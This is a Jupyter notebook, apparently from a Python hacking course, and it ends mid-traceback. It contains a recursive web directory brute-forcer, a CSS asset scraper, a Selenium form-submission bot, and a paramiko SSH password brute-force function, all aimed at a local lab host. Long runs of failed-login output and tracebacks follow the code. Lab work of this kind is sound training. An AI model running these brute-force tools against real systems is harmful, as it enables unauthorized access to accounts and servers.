{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 6,
   "metadata": {},
   "outputs": [],
   "source": [
    "import queue\n",
    "import threading\n",
    "import os\n",
    "import requests\n",
    "from urllib.request import urlopen, Request\n",
    "from urllib.error import HTTPError\n",
    "from bs4 import BeautifulSoup\n",
    "from urllib import request\n",
    "import urllib.request, urllib.error, urllib.parse\n",
    "import re\n",
    "from selenium import webdriver\n",
    "import time\n",
    "import paramiko\n",
    "from collections import deque\n",
    "import sys\n",
    "import urllib3\n",
    "from selenium.webdriver.chrome.service import Service\n",
    "from selenium.webdriver.common.by import By"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 7,
   "metadata": {},
   "outputs": [],
   "source": [
    "class MySpider():\n",
    "    def __init__(self):\n",
    "        pass\n",
    "        \n",
    "    def mygobuster(self,target):\n",
    "        wordlist = [a.strip() for a in open(\"wordlist.txt\")]\n",
    "        filters = [\".html\",\".css\",\"jpg\", \"\",\".js\",\".md\",\".png\"]\n",
    "        html = open(\"html.txt\", \"a+\") \n",
    "        for word in wordlist:\n",
    "            for f in filters:\n",
    "                url = target+word+f\n",
    "                re = requests.head(url)\n",
    "\n",
    "                if re.status_code==301 or re.status_code==401:\n",
    "                    print(\"Directory found: \", re.url, re.status_code)\n",
    "                    newurl = re.url+\"/\"\n",
    "                    \n",
    "                    self.mygobuster(newurl)\n",
    "\n",
    "                elif re.status_code==200:\n",
    "                    print(\"Found: \", re.url, re.status_code)\n",
    "                    response = urllib.request.urlopen(url)\n",
    "                    if \".html\" in re.url:\n",
    "                        html.write(re.url+\"\\n\")\n",
    "                    try:\n",
    "                        Content = response.read().decode('utf-8')\n",
    "                        f = open(\"found/\"+str(re.url).replace(\"/\",\"\"), 'w+')\n",
    "                        f.write(Content)\n",
    "                        f.close()\n",
    "                    except:\n",
    "                        Content = response.read()\n",
    "                        f = open(\"found/\"+str(re.url).replace(\"/\",\"\"), 'wb+')\n",
    "                        f.write(Content)\n",
    "                        f.close()\n",
    "                else:\n",
    "                    continue\n",
    "\n",
    "    def CSSbuster(self, target):\n",
    "        r  = requests.get(\" http://172.17.0.2:1337/stylesheet.css\")\n",
    "        data = r.text\n",
    "        l = []\n",
    "        for i in re.findall('url\\(([^)]+)\\)',data):\n",
    "            l.append(i)\n",
    "        s = [x[2:].strip('\"\"') for x in l[:2]]\n",
    "        for j in s:\n",
    "            response = urllib.request.urlopen(target+j)\n",
    "            if response.code==200:\n",
    "                print(\"Picture found:\", target+j)\n",
    "                con = response.read()\n",
    "                f = open(\"found/\"+str(response.url).replace(\"/\",\"\"), 'wb+')\n",
    "                f.write(con)\n",
    "            else:\n",
    "                pass\n",
    "    \n",
    "    \n",
    "    def myBot(self):\n",
    "        \n",
    "        s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')\n",
    "        browser = webdriver.Firefox(service=s)\n",
    "        for url in open(\"html.txt\"):\n",
    "            if url==\"http://172.17.0.2:1337/biete.html\\n\":\n",
    "                browser.get(url)\n",
    "                eingabe = browser.find_element(By.ID,\"ort\")\n",
    "                eingabe.send_keys(\"Salzburg\")\n",
    "                time.sleep(1)\n",
    "                eingabe2 = browser.find_element(By.ID,\"preis\")\n",
    "                eingabe2.send_keys(\"1500\")\n",
    "                time.sleep(1)\n",
    "                eingabe2 = browser.find_element(By.ID,\"zimmer\")\n",
    "                eingabe2.send_keys(\"5\")\n",
    "                time.sleep(1)\n",
    "                eingabe3 = browser.find_element(By.ID,\"flaeche\")\n",
    "                eingabe3.send_keys(\"500\")\n",
    "                time.sleep(1)\n",
    "                eingabe4 = browser.find_element(By.ID,\"kontakt\")\n",
    "                eingabe4.send_keys(\"Mori.r@web.de\")\n",
    "                time.sleep(1)\n",
    "\n",
    "                ein = browser.find_element(By.ID,\"saveimmoButton\")\n",
    "                ein.click()\n",
    "                time.sleep(1)\n",
    "            browser.get(url)\n",
    "            time.sleep(1)\n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 11,
   "metadata": {},
   "outputs": [],
   "source": [
    "S = MySpider()\n",
    "#S.mygobuster(\"http://172.17.0.2:1337/\")\n",
    "#S.CSSbuster(\"http://172.17.0.2:1337/\")\n",
    "#S.myBot()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "**SSH Angriff**"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": 12,
   "metadata": {},
   "outputs": [],
   "source": [
    "import sys\n",
    "import paramiko\n",
    "from collections import deque\n",
    "import queue\n",
    "import paramiko\n",
    "import time\n",
    "\n",
    "def attackssh(ip):\n",
    "    try:\n",
    "        global que\n",
    "        if len(que)==0:\n",
    "            print(\"Not found, maybe try a new wordlist?!\")\n",
    "            return 1\n",
    "        print(\"Attacking ssh.....\")\n",
    "        ssh = paramiko.SSHClient()\n",
    "        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n",
    "        for line in range(len(que)):\n",
    "            [username, password] = que.popleft().strip().split()\n",
    "            try:\n",
    "                print(f\"Trying with {username} {password}\")\n",
    "                conn = ssh.connect(ip, username=username,password=password, banner_timeout=200)\n",
    "                if conn is None:\n",
    "                    print(f\"Successfully Authenticated with {username} {password}\")\n",
    "                    return 1\n",
    "            \n",
    "            except paramiko.AuthenticationException:\n",
    "                print(\"Failed!\")\n",
    "                continue\n",
    "            \n",
    "            except paramiko.SSHException:\n",
    "                continue\n",
    "                \n",
    "    except NameError:\n",
    "        que = deque()\n",
    "        for word in open(\"sshwordlist.txt\", \"r\").readlines():\n",
    "            que.append(word)\n",
    "        attackssh(\"172.17.0.2\")        \n",
    "        "
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 13,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Attacking ssh.....\n",
      "Trying with admin password\n",
      "Failed!\n",
      "Trying with root toor\n",
      "Failed!\n",
      "Trying with admin admin\n",
      "Failed!\n",
      "Trying with server admin\n",
      "Failed!\n",
      "Trying with sinus cosinus\n",
      "Failed!\n",
      "Trying with tangens riebert\n",
      "Failed!\n",
      "Trying with supp woritz\n",
      "Failed!\n",
      "Trying with win noch\n",
      "Failed!\n",
      "Trying with admin password\n",
      "Failed!\n",
      "Trying with root toor\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with admin admin\n",
      "Trying with server admin\n",
      "Failed!\n",
      "Trying with sinus cosinus\n",
      "Trying with tangens riebert\n",
      "Trying with supp woritz\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with win noch\n",
      "Failed!\n",
      "Trying with wier und\n",
      "Trying with wolle wunktion\n",
      "Trying with wier und\n",
      "Failed!\n",
      "Trying with Admin Admin\n",
      "Failed!\n",
      "Trying with wolle wunktion\n",
      "Failed!\n",
      "Trying with admin password\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with root toor\n",
      "Failed!\n",
      "Trying with admin admin\n",
      "Trying with server admin\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with sinus cosinus\n",
      "Trying with tangens riebert\n",
      "Failed!\n",
      "Trying with supp woritz\n",
      "Trying with win noch\n",
      "Trying with admin password\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with root toor\n",
      "Trying with admin admin\n",
      "Failed!\n",
      "Trying with server admin\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with sinus cosinus\n",
      "Trying with tangens riebert\n",
      "Trying with supp woritz\n",
      "Trying with win noch\n",
      "Trying with wier und\n",
      "Trying with wolle wunktion\n",
      "Failed!\n",
      "Trying with wier und\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
